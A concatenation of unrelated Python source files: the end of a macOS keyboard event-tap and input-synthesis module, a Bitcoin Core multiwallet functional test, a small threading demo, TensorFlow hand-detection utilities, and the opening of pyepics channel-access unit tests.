        scan_code = Quartz.CGEventGetIntegerValueField(event, Quartz.kCGKeyboardEventKeycode)
        key_name = name_from_scancode(scan_code)
        flags = Quartz.CGEventGetFlags(event)
        event_type = ""
        is_keypad = (flags & Quartz.kCGEventFlagMaskNumericPad)
        if e_type == Quartz.kCGEventKeyDown:
            event_type = "down"
        elif e_type == Quartz.kCGEventKeyUp:
            event_type = "up"
        elif e_type == Quartz.kCGEventFlagsChanged:
            # Modifier keys only produce FlagsChanged events; infer down/up
            # from whether the corresponding flag bit is now set.
            if key_name.endswith("shift") and (flags & Quartz.kCGEventFlagMaskShift):
                event_type = "down"
            elif key_name == "caps lock" and (flags & Quartz.kCGEventFlagMaskAlphaShift):
                event_type = "down"
            elif (key_name.endswith("option") or key_name.endswith("alt")) and (flags & Quartz.kCGEventFlagMaskAlternate):
                event_type = "down"
            elif key_name == "ctrl" and (flags & Quartz.kCGEventFlagMaskControl):
                event_type = "down"
            elif key_name == "command" and (flags & Quartz.kCGEventFlagMaskCommand):
                event_type = "down"
            else:
                event_type = "up"

        if self.blocking:
            # Returning None from a tap callback drops the event.
            return None

        self.callback(KeyboardEvent(event_type, scan_code, name=key_name, is_keypad=is_keypad))
        return event
# Module-wide controller used by the exported wrapper functions below.
key_controller = KeyController()

""" Exported functions below """


def init():
    """Re-create the module-wide KeyController (e.g. after a layout change).

    BUG FIX: without the ``global`` declaration the assignment only bound a
    function-local name, so init() was silently a no-op.
    """
    global key_controller
    key_controller = KeyController()
def press(scan_code):
    """Emit a key-down event for *scan_code* via the module-wide controller."""
    key_controller.press(scan_code)
def release(scan_code):
    """Emit a key-up event for *scan_code* via the module-wide controller."""
    key_controller.release(scan_code)
def map_char(character):
    """Resolve *character* to (scan_code, modifiers), where modifiers is a
    list of modifier names such as 'shift'."""
    return key_controller.map_char(character)
def name_from_scancode(scan_code):
    """Resolve *scan_code* to its key name or character."""
    return key_controller.map_scan_code(scan_code)
def listen(callback):
    """Start a background listener feeding keyboard events to *callback*.

    Must be run as root (administrator); otherwise raises OSError.
    """
    if os.geteuid() != 0:
        raise OSError("Error 13 - Must be run as administrator")
    worker = threading.Thread(target=KeyEventListener(callback).run, args=())
    worker.daemon = True
    worker.start()
def type_unicode(character):
    """Post *character* as a synthetic unicode keyboard event (down then up)."""
    source = Quartz.CGEventSourceCreate(Quartz.kCGEventSourceStateHIDSystemState)
    # UTF-16 code-unit count (surrogate pairs count as two units).
    unit_count = len(character.encode('utf-16-le')) // 2
    for is_key_down in (True, False):
        event = Quartz.CGEventCreateKeyboardEvent(source, 0, is_key_down)
        Quartz.CGEventKeyboardSetUnicodeString(event, unit_count, character)
        Quartz.CGEventPost(Quartz.kCGSessionEventTap, event)
wallet_multiwallet.py | #!/usr/bin/env python3
# Copyright (c) 2017-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test multiwallet.
Verify that a bitcoind node can load multiple wallet files
"""
from decimal import Decimal
from threading import Thread
import os
import shutil
import time
from test_framework.authproxy import JSONRPCException
from test_framework.test_framework import BitcoinTestFramework
from test_framework.test_node import ErrorMatch
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
get_rpc_proxy,
)
# Wallet version number; not referenced in this chunk — presumably matches
# the latest wallet feature version in Bitcoin Core (TODO confirm).
FEATURE_LATEST = 169900

# Shared flag: set by test_load_unload() once any thread observes the
# expected concurrent-load RPC error, telling the other threads to stop.
got_loading_error = False
def test_load_unload(node, name):
    """Repeatedly load/unload wallet *name*, stopping as soon as any thread
    has observed the expected 'already loading' RPC error."""
    global got_loading_error
    attempts = 0
    while attempts < 10 and not got_loading_error:
        attempts += 1
        try:
            node.loadwallet(name)
            node.unloadwallet(name)
        except JSONRPCException as e:
            if e.error['code'] == -4 and 'Wallet already being loading' in e.error['message']:
                got_loading_error = True
                return
class MultiWalletTest(BitcoinTestFramework):
    """Verify that a bitcoind node can create, load, unload and back up
    multiple wallet files (plain files, directories, symlinks, absolute
    and relative paths)."""

    def set_test_params(self):
        # Node 0 exercises multiwallet behaviour; node 1 is only used for
        # the cross-node walletdir-locking checks at the end of run_test().
        self.setup_clean_chain = True
        self.num_nodes = 2
        self.rpc_timeout = 120

    def skip_test_if_missing_module(self):
        self.skip_if_no_wallet()

    def add_options(self, parser):
        parser.add_argument(
            '--data_wallets_dir',
            default=os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data/wallets/'),
            help='Test data with wallet directories (default: %(default)s)',
        )

    def run_test(self):
        node = self.nodes[0]
        # Small path helpers; `wallet` returns a per-wallet RPC proxy.
        data_dir = lambda *p: os.path.join(node.datadir, self.chain, *p)
        wallet_dir = lambda *p: data_dir('wallets', *p)
        wallet = lambda name: node.get_wallet_rpc(name)

        def wallet_file(name):
            # Directory-style wallets keep their data in <dir>/wallet.dat;
            # otherwise the name is the wallet file itself.
            if os.path.isdir(wallet_dir(name)):
                return wallet_dir(name, "wallet.dat")
            return wallet_dir(name)

        assert_equal(self.nodes[0].listwalletdir(), { 'wallets': [{ 'name': '' }] })
        # check wallet.dat is created
        self.stop_nodes()
        assert_equal(os.path.isfile(wallet_dir('wallet.dat')), True)
        # create symlink to verify wallet directory path can be referenced
        # through symlink
        os.mkdir(wallet_dir('w7'))
        os.symlink('w7', wallet_dir('w7_symlink'))
        # rename wallet.dat to make sure plain wallet file paths (as opposed to
        # directory paths) can be loaded
        os.rename(wallet_dir("wallet.dat"), wallet_dir("w8"))
        # create another dummy wallet for use in testing backups later
        self.start_node(0, [])
        self.stop_nodes()
        empty_wallet = os.path.join(self.options.tmpdir, 'empty.dat')
        os.rename(wallet_dir("wallet.dat"), empty_wallet)
        # restart node with a mix of wallet names:
        #   w1, w2, w3 - to verify new wallets created when non-existing paths specified
        #   w          - to verify wallet name matching works when one wallet path is prefix of another
        #   sub/w5     - to verify relative wallet path is created correctly
        #   extern/w6  - to verify absolute wallet path is created correctly
        #   w7_symlink - to verify symlinked wallet path is initialized correctly
        #   w8         - to verify existing wallet file is loaded correctly
        #   ''         - to verify default wallet file is created correctly
        wallet_names = ['w1', 'w2', 'w3', 'w', 'sub/w5', os.path.join(self.options.tmpdir, 'extern/w6'), 'w7_symlink', 'w8', '']
        extra_args = ['-wallet={}'.format(n) for n in wallet_names]
        self.start_node(0, extra_args)
        assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), ['', os.path.join('sub', 'w5'), 'w', 'w1', 'w2', 'w3', 'w7', 'w7_symlink', 'w8'])
        assert_equal(set(node.listwallets()), set(wallet_names))
        # check that all requested wallets were created
        self.stop_node(0)
        for wallet_name in wallet_names:
            assert_equal(os.path.isfile(wallet_file(wallet_name)), True)
        # should not initialize if wallet path can't be created
        exp_stderr = "boost::filesystem::create_directory:"
        self.nodes[0].assert_start_raises_init_error(['-wallet=wallet.dat/bad'], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
        self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" does not exist')
        self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" is a relative path', cwd=data_dir())
        self.nodes[0].assert_start_raises_init_error(['-walletdir=debug.log'], 'Error: Specified -walletdir "debug.log" is not a directory', cwd=data_dir())
        # should not initialize if there are duplicate wallets
        self.nodes[0].assert_start_raises_init_error(['-wallet=w1', '-wallet=w1'], 'Error: Error loading wallet w1. Duplicate -wallet filename specified.')
        # should not initialize if one wallet is a copy of another
        shutil.copyfile(wallet_dir('w8'), wallet_dir('w8_copy'))
        exp_stderr = r"BerkeleyBatch: Can't open database w8_copy \(duplicates fileid \w+ from w8\)"
        self.nodes[0].assert_start_raises_init_error(['-wallet=w8', '-wallet=w8_copy'], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
        # should not initialize if wallet file is a symlink
        os.symlink('w8', wallet_dir('w8_symlink'))
        self.nodes[0].assert_start_raises_init_error(['-wallet=w8_symlink'], r'Error: Invalid -wallet path \'w8_symlink\'\. .*', match=ErrorMatch.FULL_REGEX)
        # should not initialize if the specified walletdir does not exist
        self.nodes[0].assert_start_raises_init_error(['-walletdir=bad'], 'Error: Specified -walletdir "bad" does not exist')
        # should not initialize if the specified walletdir is not a directory
        not_a_dir = wallet_dir('notadir')
        open(not_a_dir, 'a', encoding="utf8").close()
        self.nodes[0].assert_start_raises_init_error(['-walletdir=' + not_a_dir], 'Error: Specified -walletdir "' + not_a_dir + '" is not a directory')
        self.log.info("Do not allow -zapwallettxes with multiwallet")
        self.nodes[0].assert_start_raises_init_error(['-zapwallettxes', '-wallet=w1', '-wallet=w2'], "Error: -zapwallettxes is only allowed with a single wallet file")
        self.nodes[0].assert_start_raises_init_error(['-zapwallettxes=1', '-wallet=w1', '-wallet=w2'], "Error: -zapwallettxes is only allowed with a single wallet file")
        self.nodes[0].assert_start_raises_init_error(['-zapwallettxes=2', '-wallet=w1', '-wallet=w2'], "Error: -zapwallettxes is only allowed with a single wallet file")
        # if wallets/ doesn't exist, datadir should be the default wallet dir
        wallet_dir2 = data_dir('walletdir')
        os.rename(wallet_dir(), wallet_dir2)
        self.start_node(0, ['-wallet=w4', '-wallet=w5'])
        assert_equal(set(node.listwallets()), {"w4", "w5"})
        w5 = wallet("w5")
        node.generatetoaddress(nblocks=1, address=w5.getnewaddress())
        # now if wallets/ exists again, but the rootdir is specified as the walletdir, w4 and w5 should still be loaded
        os.rename(wallet_dir2, wallet_dir())
        self.restart_node(0, ['-wallet=w4', '-wallet=w5', '-walletdir=' + data_dir()])
        assert_equal(set(node.listwallets()), {"w4", "w5"})
        w5 = wallet("w5")
        w5_info = w5.getwalletinfo()
        assert_equal(w5_info['immature_balance'], 50)
        # a second node must not be able to share the same walletdir
        competing_wallet_dir = os.path.join(self.options.tmpdir, 'competing_walletdir')
        os.mkdir(competing_wallet_dir)
        self.restart_node(0, ['-walletdir=' + competing_wallet_dir])
        exp_stderr = r"Error: Error initializing wallet database environment \"\S+competing_walletdir\"!"
        self.nodes[1].assert_start_raises_init_error(['-walletdir=' + competing_wallet_dir], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
        self.restart_node(0, extra_args)
        assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), ['', os.path.join('sub', 'w5'), 'w', 'w1', 'w2', 'w3', 'w7', 'w7_symlink', 'w8', 'w8_copy'])
        wallets = [wallet(w) for w in wallet_names]
        wallet_bad = wallet("bad")
        # check wallet names and balances
        node.generatetoaddress(nblocks=1, address=wallets[0].getnewaddress())
        # NOTE: this loop shadows the `wallet` lambda defined above, which
        # is not used again afterwards.
        for wallet_name, wallet in zip(wallet_names, wallets):
            info = wallet.getwalletinfo()
            assert_equal(info['immature_balance'], 50 if wallet is wallets[0] else 0)
            assert_equal(info['walletname'], wallet_name)
        # accessing invalid wallet fails
        assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", wallet_bad.getwalletinfo)
        # accessing wallet RPC without using wallet endpoint fails
        assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
        w1, w2, w3, w4, *_ = wallets
        node.generatetoaddress(nblocks=101, address=w1.getnewaddress())
        assert_equal(w1.getbalance(), 100)
        assert_equal(w2.getbalance(), 0)
        assert_equal(w3.getbalance(), 0)
        assert_equal(w4.getbalance(), 0)
        w1.sendtoaddress(w2.getnewaddress(), 1)
        w1.sendtoaddress(w3.getnewaddress(), 2)
        w1.sendtoaddress(w4.getnewaddress(), 3)
        node.generatetoaddress(nblocks=1, address=w1.getnewaddress())
        assert_equal(w2.getbalance(), 1)
        assert_equal(w3.getbalance(), 2)
        assert_equal(w4.getbalance(), 3)
        # batch RPC requests are routed to the wallet endpoint of the proxy
        batch = w1.batch([w1.getblockchaininfo.get_request(), w1.getwalletinfo.get_request()])
        assert_equal(batch[0]["result"]["chain"], self.chain)
        assert_equal(batch[1]["result"]["walletname"], "w1")
        self.log.info('Check for per-wallet settxfee call')
        assert_equal(w1.getwalletinfo()['paytxfee'], 0)
        assert_equal(w2.getwalletinfo()['paytxfee'], 0)
        w2.settxfee(0.001)
        assert_equal(w1.getwalletinfo()['paytxfee'], 0)
        assert_equal(w2.getwalletinfo()['paytxfee'], Decimal('0.00100000'))
        self.log.info("Test dynamic wallet loading")
        self.restart_node(0, ['-nowallet'])
        assert_equal(node.listwallets(), [])
        assert_raises_rpc_error(-32601, "Method not found", node.getwalletinfo)
        self.log.info("Load first wallet")
        loadwallet_name = node.loadwallet(wallet_names[0])
        assert_equal(loadwallet_name['name'], wallet_names[0])
        assert_equal(node.listwallets(), wallet_names[0:1])
        node.getwalletinfo()
        w1 = node.get_wallet_rpc(wallet_names[0])
        w1.getwalletinfo()
        self.log.info("Load second wallet")
        loadwallet_name = node.loadwallet(wallet_names[1])
        assert_equal(loadwallet_name['name'], wallet_names[1])
        assert_equal(node.listwallets(), wallet_names[0:2])
        # with >1 wallet loaded, the wallet-less endpoint is ambiguous
        assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
        w2 = node.get_wallet_rpc(wallet_names[1])
        w2.getwalletinfo()
        self.log.info("Concurrent wallet loading")
        threads = []
        for _ in range(3):
            n = node.cli if self.options.usecli else get_rpc_proxy(node.url, 1, timeout=600, coveragedir=node.coverage_dir)
            t = Thread(target=test_load_unload, args=(n, wallet_names[2], ))
            t.start()
            threads.append(t)
        for t in threads:
            t.join()
        global got_loading_error
        assert_equal(got_loading_error, True)
        self.log.info("Load remaining wallets")
        for wallet_name in wallet_names[2:]:
            loadwallet_name = self.nodes[0].loadwallet(wallet_name)
            assert_equal(loadwallet_name['name'], wallet_name)
        assert_equal(set(self.nodes[0].listwallets()), set(wallet_names))
        # Fail to load if wallet doesn't exist
        assert_raises_rpc_error(-18, 'Wallet wallets not found.', self.nodes[0].loadwallet, 'wallets')
        # Fail to load duplicate wallets
        assert_raises_rpc_error(-4, 'Wallet file verification failed. Error loading wallet w1. Duplicate -wallet filename specified.', self.nodes[0].loadwallet, wallet_names[0])
        # Fail to load duplicate wallets by different ways (directory and filepath)
        assert_raises_rpc_error(-4, "Wallet file verification failed. Error loading wallet wallet.dat. Duplicate -wallet filename specified.", self.nodes[0].loadwallet, 'wallet.dat')
        # Fail to load if one wallet is a copy of another
        assert_raises_rpc_error(-4, "BerkeleyBatch: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')
        # Fail to load if one wallet is a copy of another, test this twice to make sure that we don't re-introduce #14304
        assert_raises_rpc_error(-4, "BerkeleyBatch: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')
        # Fail to load if wallet file is a symlink
        assert_raises_rpc_error(-4, "Wallet file verification failed. Invalid -wallet path 'w8_symlink'", self.nodes[0].loadwallet, 'w8_symlink')
        # Fail to load if a directory is specified that doesn't contain a wallet
        os.mkdir(wallet_dir('empty_wallet_dir'))
        assert_raises_rpc_error(-18, "Directory empty_wallet_dir does not contain a wallet.dat file", self.nodes[0].loadwallet, 'empty_wallet_dir')
        self.log.info("Test dynamic wallet creation.")
        # Fail to create a wallet if it already exists.
        assert_raises_rpc_error(-4, "Wallet w2 already exists.", self.nodes[0].createwallet, 'w2')
        # Successfully create a wallet with a new name
        loadwallet_name = self.nodes[0].createwallet('w9')
        assert_equal(loadwallet_name['name'], 'w9')
        w9 = node.get_wallet_rpc('w9')
        assert_equal(w9.getwalletinfo()['walletname'], 'w9')
        assert 'w9' in self.nodes[0].listwallets()
        # Successfully create a wallet using a full path
        new_wallet_dir = os.path.join(self.options.tmpdir, 'new_walletdir')
        new_wallet_name = os.path.join(new_wallet_dir, 'w10')
        loadwallet_name = self.nodes[0].createwallet(new_wallet_name)
        assert_equal(loadwallet_name['name'], new_wallet_name)
        w10 = node.get_wallet_rpc(new_wallet_name)
        assert_equal(w10.getwalletinfo()['walletname'], new_wallet_name)
        assert new_wallet_name in self.nodes[0].listwallets()
        self.log.info("Test dynamic wallet unloading")
        # Test `unloadwallet` errors
        assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].unloadwallet)
        assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", self.nodes[0].unloadwallet, "dummy")
        assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", node.get_wallet_rpc("dummy").unloadwallet)
        assert_raises_rpc_error(-8, "Cannot unload the requested wallet", w1.unloadwallet, "w2"),
        # Successfully unload the specified wallet name
        self.nodes[0].unloadwallet("w1")
        assert 'w1' not in self.nodes[0].listwallets()
        # Successfully unload the wallet referenced by the request endpoint
        # Also ensure unload works during walletpassphrase timeout
        w2.encryptwallet('test')
        w2.walletpassphrase('test', 1)
        w2.unloadwallet()
        time.sleep(1.1)
        assert 'w2' not in self.nodes[0].listwallets()
        # Successfully unload all wallets
        for wallet_name in self.nodes[0].listwallets():
            self.nodes[0].unloadwallet(wallet_name)
        assert_equal(self.nodes[0].listwallets(), [])
        assert_raises_rpc_error(-32601, "Method not found (wallet method is disabled because no wallet is loaded)", self.nodes[0].getwalletinfo)
        # Successfully load a previously unloaded wallet
        self.nodes[0].loadwallet('w1')
        assert_equal(self.nodes[0].listwallets(), ['w1'])
        assert_equal(w1.getwalletinfo()['walletname'], 'w1')
        assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), ['', os.path.join('sub', 'w5'), 'w', 'w1', 'w2', 'w3', 'w7', 'w7_symlink', 'w8', 'w8_copy', 'w9'])
        # Test backing up and restoring wallets
        self.log.info("Test wallet backup")
        self.restart_node(0, ['-nowallet'])
        for wallet_name in wallet_names:
            self.nodes[0].loadwallet(wallet_name)
        for wallet_name in wallet_names:
            rpc = self.nodes[0].get_wallet_rpc(wallet_name)
            addr = rpc.getnewaddress()
            backup = os.path.join(self.options.tmpdir, 'backup.dat')
            rpc.backupwallet(backup)
            self.nodes[0].unloadwallet(wallet_name)
            # overwrite with the empty wallet: the address must disappear
            shutil.copyfile(empty_wallet, wallet_file(wallet_name))
            self.nodes[0].loadwallet(wallet_name)
            assert_equal(rpc.getaddressinfo(addr)['ismine'], False)
            self.nodes[0].unloadwallet(wallet_name)
            # restore the backup: the address must be ours again
            shutil.copyfile(backup, wallet_file(wallet_name))
            self.nodes[0].loadwallet(wallet_name)
            assert_equal(rpc.getaddressinfo(addr)['ismine'], True)
        # Test .walletlock file is closed
        self.start_node(1)
        wallet = os.path.join(self.options.tmpdir, 'my_wallet')
        self.nodes[0].createwallet(wallet)
        assert_raises_rpc_error(-4, "Error initializing wallet database environment", self.nodes[1].loadwallet, wallet)
        self.nodes[0].unloadwallet(wallet)
        self.nodes[1].loadwallet(wallet)
if __name__ == '__main__':
    # Script entry point: run the functional test.
    MultiWalletTest().main()
|
01.py | import threading
from time import sleep
# Shared flag read by the reader thread. Initialise it here: the original
# module-level ``global bown`` statement was a no-op and left the name
# unbound, so LerVelocidade() could raise NameError if its thread ran
# before wait() made the first assignment.
bown = 0

# function that waits 1 second per cycle
def wait():
    """Tick once per second, pulsing the shared ``bown`` flag.

    Each cycle lowers ``bown`` to 0, prints the cycle counter, sleeps one
    second, then raises the flag to 1 (access is unsynchronized — see the
    mutex TODO at the bottom of this script).
    """
    cont = 0
    global bown
    while True:
        bown = 0
        print(cont)
        cont += 1
        sleep(1)
        bown = 1
        # print(bown)
def LerVelocidade():
    """Busy-wait on the shared ``bown`` flag and report each raised pulse."""
    global bown
    while True:
        if bown == 1:
            print('Leitura da Velocidade')
# ---------------- creating the threads
# TODO: add a mutex — access to the shared ``bown`` flag is unsynchronized
t = threading.Thread(target=wait, name='Wait')
t1 = threading.Thread(target=LerVelocidade, name='Velocidade')
t.start()
t1.start()
print("vou adicionar só algumas coisinhas pra ver se vai commitar")
# adding a comment
# testing again
|
detector_utils.py | # Utilities for object detector.
import numpy as np
import sys
import tensorflow as tf
import os
from threading import Thread
from datetime import datetime
import cv2
from utils import label_map_util
from collections import defaultdict
# Module-level graph object. NOTE: load_inference_graph() below creates and
# returns its own graph, shadowing this one — this object is never used.
detection_graph = tf.Graph()
sys.path.append("..")

# score threshold for showing bounding boxes.
_score_thresh = 0.27

MODEL_NAME = 'hand_inference_graph'
# Path to frozen detection graph. This is the actual model that is used for the object detection.
PATH_TO_CKPT = MODEL_NAME + '/frozen_inference_graph.pb'
# List of the strings that is used to add correct label for each box.
PATH_TO_LABELS = os.path.join(MODEL_NAME, 'hand_label_map.pbtxt')
NUM_CLASSES = 1

# load label map (executed at import time; requires the model files on disk)
label_map = label_map_util.load_labelmap(PATH_TO_LABELS)
categories = label_map_util.convert_label_map_to_categories(
    label_map, max_num_classes=NUM_CLASSES, use_display_name=True)
category_index = label_map_util.create_category_index(categories)
# Load a frozen inference graph into memory
def load_inference_graph():
    """Deserialize the frozen hand-detection graph and open a session on it.

    Returns:
        (graph, session): the imported tf.Graph and a tf.Session bound to it,
        ready to be passed to detect_objects().
    """
    print("> ====== loading HAND frozen graph into memory")
    graph = tf.Graph()
    with graph.as_default():
        graph_def = tf.GraphDef()
        with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:
            graph_def.ParseFromString(fid.read())
        tf.import_graph_def(graph_def, name='')
        sess = tf.Session(graph=graph)
    print("> ====== Hand Inference graph loaded.")
    return graph, sess
# draw the detected bounding boxes on the images
# You can modify this to also draw a label.
def draw_box_on_image(num_hands_detect, score_thresh, scores, boxes, im_width, im_height, image_np):
    """Draw a green rectangle on *image_np* for every detection whose score
    exceeds *score_thresh*. Boxes are normalized [ymin, xmin, ymax, xmax]."""
    for idx in range(num_hands_detect):
        if scores[idx] <= score_thresh:
            continue
        box = boxes[idx]
        left, right = box[1] * im_width, box[3] * im_width
        top, bottom = box[0] * im_height, box[2] * im_height
        top_left = (int(left), int(top))
        bottom_right = (int(right), int(bottom))
        cv2.rectangle(image_np, top_left, bottom_right, (77, 255, 9), 3, 1)
def get_centroid(num_hands_detect, score_thresh, scores, boxes, im_width, im_height, image_np):
    """Return the centre (x, y) of the first detection above *score_thresh*,
    drawing a red marker circle at that point on *image_np*.

    Returns ``None`` when no detection clears the threshold (the original
    fell off the loop implicitly, and an ``if centroid is not None`` guard
    placed right after the tuple assignment was dead code — a freshly built
    tuple is never ``None``).
    """
    for i in range(num_hands_detect):
        if scores[i] > score_thresh:
            left, right = boxes[i][1] * im_width, boxes[i][3] * im_width
            top, bottom = boxes[i][0] * im_height, boxes[i][2] * im_height
            centroid = (int((left + right) / 2.0), int((top + bottom) / 2.0))
            cv2.circle(image_np, centroid, 5, (0, 0, 255), 1)
            return centroid
    return None
def get_box_image(num_hands_detect, score_thresh, scores, boxes, im_width, im_height, image_np):
    """Return a copy of the image region covered by the first detection whose
    score exceeds *score_thresh*; implicitly returns ``None`` when no
    detection qualifies. Boxes are normalized [ymin, xmin, ymax, xmax]."""
    for i in range(num_hands_detect):
        if scores[i] > score_thresh:
            box = boxes[i]
            left = box[1] * im_width
            right = box[3] * im_width
            top = box[0] * im_height
            bottom = box[2] * im_height
            # Kept from the original (computed but unused):
            p1 = (int(left), int(top))
            p2 = (int(right), int(bottom))
            centroid = (int(left / 2), int(top / 2))
            return image_np[int(top):int(bottom), int(left):int(right)].copy()
            # return centroid
# Show fps value on image.
def draw_fps_on_image(fps, image_np):
    """Overlay the *fps* string near the top-left corner of the frame."""
    origin = (20, 50)
    green = (77, 255, 9)
    cv2.putText(image_np, fps, origin,
                cv2.FONT_HERSHEY_SIMPLEX, 0.75, green, 2)
# Actual detection .. generate scores and bounding boxes given an image
def detect_objects(image_np, detection_graph, sess):
    """Run one inference pass of the frozen graph on *image_np*.

    Returns:
        (boxes, scores) with the batch dimension squeezed away.
    """
    # Input placeholder and output tensors of the frozen graph.
    image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
    # Each box is a region of the image where an object was detected.
    detection_boxes = detection_graph.get_tensor_by_name('detection_boxes:0')
    # Confidence score per detection, shown alongside the class label.
    detection_scores = detection_graph.get_tensor_by_name('detection_scores:0')
    detection_classes = detection_graph.get_tensor_by_name('detection_classes:0')
    num_detections = detection_graph.get_tensor_by_name('num_detections:0')

    # The model expects a leading batch dimension.
    batched = np.expand_dims(image_np, axis=0)
    (boxes, scores, classes, num) = sess.run(
        [detection_boxes, detection_scores,
         detection_classes, num_detections],
        feed_dict={image_tensor: batched})
    return np.squeeze(boxes), np.squeeze(scores)
# Code to thread reading camera input.
# Source : Adrian Rosebrock
# https://www.pyimagesearch.com/2017/02/06/faster-video-file-fps-with-cv2-videocapture-and-opencv/
class WebcamVideoStream:
    """Threaded webcam reader: a background thread keeps grabbing frames so
    read() always returns the most recent one without blocking."""

    def __init__(self, src, width, height):
        # Open the capture device and prime it with a first frame.
        self.stream = cv2.VideoCapture(src + cv2.CAP_DSHOW)
        self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, width)
        self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
        (self.grabbed, self.frame) = self.stream.read()
        # Flag used to ask the reader thread to exit.
        self.stopped = False

    def start(self):
        """Spawn the background reader thread; returns self for chaining."""
        Thread(target=self.update, args=()).start()
        return self

    def update(self):
        """Grab frames continuously until stop() raises the flag."""
        while not self.stopped:
            (self.grabbed, self.frame) = self.stream.read()

    def read(self):
        """Return the frame most recently grabbed by the reader thread."""
        return self.frame

    def size(self):
        """Return (width, height) as reported by the capture device."""
        return self.stream.get(3), self.stream.get(4)

    def stop(self):
        """Signal the reader thread to terminate."""
        self.stopped = True
|
test_pv_unittests.py | #!/usr/bin/env python
# unit-tests for ca interface
import sys
import time
import numpy
import threading
import pytest
from contextlib import contextmanager
from epics import PV, get_pv, caput, caget, caget_many, caput_many, ca
import pvnames
def write(msg):
    """Write *msg* to stdout and flush immediately (unbuffered logging)."""
    out = sys.stdout
    out.write(msg)
    out.flush()
# Connection states recorded by onConnect(), keyed by PV name.
CONN_DAT = {}
# Most recent values recorded by onChanges(), keyed by PV name.
CHANGE_DAT = {}
def onConnect(pvname=None, conn=None, chid=None, **kws):
    """Connection callback: log and record the connection state per PV."""
    global CONN_DAT
    write(' :Connection status changed: %s connected=%s\n' % (pvname, conn))
    CONN_DAT[pvname] = conn
def onChanges(pvname=None, value=None, **kws):
    """Monitor callback: log and record the most recent value per PV."""
    global CHANGE_DAT
    write('/// New Value: %s value=%s, kw=%s\n' % (pvname, str(value), repr(kws)))
    CHANGE_DAT[pvname] = value
@contextmanager
def no_simulator_updates():
    '''Context manager which pauses and resumes simulator PV updating'''
    try:
        # Pause the simulator, then give it a moment to settle.
        caput(pvnames.pause_pv, 1, wait=True)
        time.sleep(0.05)
        yield
    finally:
        # Always resume updates, even if the body (or the pause put) raised.
        caput(pvnames.pause_pv, 0, wait=True)
def test_CreatePV():
    """get_pv() returns a usable PV object."""
    write('Simple Test: create pv\n')
    pv = get_pv(pvnames.double_pv)
    assert pv is not None

def test_CreatedWithConn():
    """A connection callback fires and records the connected state."""
    write('Simple Test: create pv with conn callback\n')
    pv = get_pv(pvnames.int_pv, connection_callback=onConnect)
    val = pv.get()
    global CONN_DAT
    conn = CONN_DAT.get(pvnames.int_pv, None)
    assert conn

def test_caget():
    """caget() returns a value for each PV type; the string PV is 'ao'."""
    write('Simple Test of caget() function\n')
    pvs = (pvnames.double_pv, pvnames.enum_pv, pvnames.str_pv)
    for p in pvs:
        val = caget(p)
        assert val is not None
    assert caget(pvnames.str_pv) == 'ao'

def test_caget_many():
    """caget_many() preserves order and native types."""
    write('Simple Test of caget_many() function\n')
    pvs = [pvnames.double_pv, pvnames.enum_pv, pvnames.str_pv]
    vals = caget_many(pvs)
    assert len(vals) == len(pvs)
    assert isinstance(vals[0], float)
    assert isinstance(vals[1], int)
    assert isinstance(vals[2], str)

def test_caput_many_wait_all():
    """caput_many(wait='all'): valid puts succeed, the bogus PV fails."""
    write('Test of caput_many() function, waiting for all.\n')
    pvs = [pvnames.double_pv, pvnames.enum_pv, 'ceci nest pas une PV']
    #pvs = ["MTEST:Val1", "MTEST:Val2", "MTEST:SlowVal"]
    vals = [0.5, 0, 23]
    t0 = time.time()
    success = caput_many(pvs, vals, wait='all', connection_timeout=0.5, put_timeout=5.0)
    t1 = time.time()
    assert len(success) == len(pvs)
    assert success[0] == 1
    assert success[1] == 1
    assert success[2] < 0

def test_caput_many_wait_each():
    """caput_many(wait='each') behaves like wait='all' for these PVs."""
    write('Simple Test of caput_many() function, waiting for each.\n')
    pvs = [pvnames.double_pv, pvnames.enum_pv, 'ceci nest pas une PV']
    #pvs = ["MTEST:Val1", "MTEST:Val2", "MTEST:SlowVal"]
    vals = [0.5, 0, 23]
    success = caput_many(pvs, vals, wait='each', connection_timeout=0.5, put_timeout=1.0)
    assert len(success) == len(pvs)
    assert success[0] == 1
    assert success[1] == 1
    assert success[2] < 0

def test_caput_many_no_wait():
    """caput_many(wait=None) reports success once puts are issued."""
    write('Simple Test of caput_many() function, without waiting.\n')
    pvs = [pvnames.double_pv, pvnames.enum_pv, 'ceci nest pas une PV']
    #pvs = ["MTEST:Val1", "MTEST:Val2", "MTEST:SlowVal"]
    vals = [0.5, 0, 23]
    success = caput_many(pvs, vals, wait=None, connection_timeout=0.5)
    assert len(success) == len(pvs)
    #If you don't wait, ca.put returns 1 as long as the PV connects
    #and the put request is valid.
    assert (success[0] == 1)
    assert (success[1] == 1)
    assert (success[2] < 0)
def test_get1():
    """value and char_value agree for an integer PV."""
    write('Simple Test: test value and char_value on an integer\n')
    with no_simulator_updates():
        pv = get_pv(pvnames.int_pv)
        val = pv.get()
        cval = pv.get(as_string=True)
        assert int(cval) == val

def test_get_with_metadata():
    """get_with_metadata() returns metadata matching the requested form."""
